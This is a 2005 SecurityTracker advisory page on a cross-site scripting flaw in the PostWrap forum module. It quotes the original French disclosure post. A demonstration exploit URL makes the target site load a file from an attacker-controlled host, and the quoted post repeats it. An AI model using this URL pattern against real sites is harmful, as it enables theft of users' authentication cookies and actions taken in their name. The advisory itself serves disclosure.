SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   PostWrap Module Vendors:   McKenzie, Shawn
PostWrap Lets Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1013130
SecurityTracker URL:  http://securitytracker.com/id/1013130
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 9 2005
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  

Description:   Albania Security Clan reported an input validation vulnerability in the PostWrap module. A remote user can conduct cross-site scripting attacks.

The module (by design) allows remote web pages to be displayed on the target web site. As a result, a remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will be rendered by the site running the PostWrap Module software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit to display HTML code from the 'ascmd.txt' file on the target web site is provided:

http://[target]/index.php?module=PostWrap&page=http://[attacker]/HACK/asc/ascmd.txt

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PostWrap software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  spidean.mckenzies.net/Topic3.phtml (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  XSS VULNERABILITY AT MODULE PostWrap


module PostWrap le problem est au niveu de 
/index.php?module=PostWrap&page=http://hostename.com/HACK/asc/ascmd.txt c n'est po une 
javascript regardez plutot:
ceci est un exemple de code qu'on peux injecter,
puis vous mettez ce code source dans un fichier .txt et vous l'uploader sur un site web 
(server) pour povoire l'injecter.
Meilleurs Salutations d'Albanie.
www.albanianhaxorz.org | irc.gigachat.net #ASC

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC